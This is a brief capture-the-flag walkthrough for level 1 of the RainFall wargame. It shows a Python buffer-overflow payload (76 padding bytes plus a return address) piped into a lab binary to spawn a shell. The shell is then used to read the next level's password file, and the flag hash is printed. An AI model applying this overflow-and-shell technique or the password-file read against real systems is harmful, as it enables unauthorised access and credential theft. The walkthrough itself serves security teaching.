C-Chafik/rainfall/level1/walkthrough.md

 So it should be executing a shell so that we can go to the next level, but it crashed, we need to keep an input on the binary.

 ```
 level1@RainFall:~$ (python -c "print 'A' * 76 + '\x44\x84\x04\x08'" ; cat) | ./level1
 Good...
 Wait what?
 cat /home/user/level2/.pass
 53a4a712787f40ec66c3c26c1f4b164dcad5552b038bb0addd69bf5bf6fa8e77
 ```

-We print give the injection input to the binary while and then execute a cat to still have an input on it, so that after the "/bin/sh" call we can still write to the binary and cat our flag.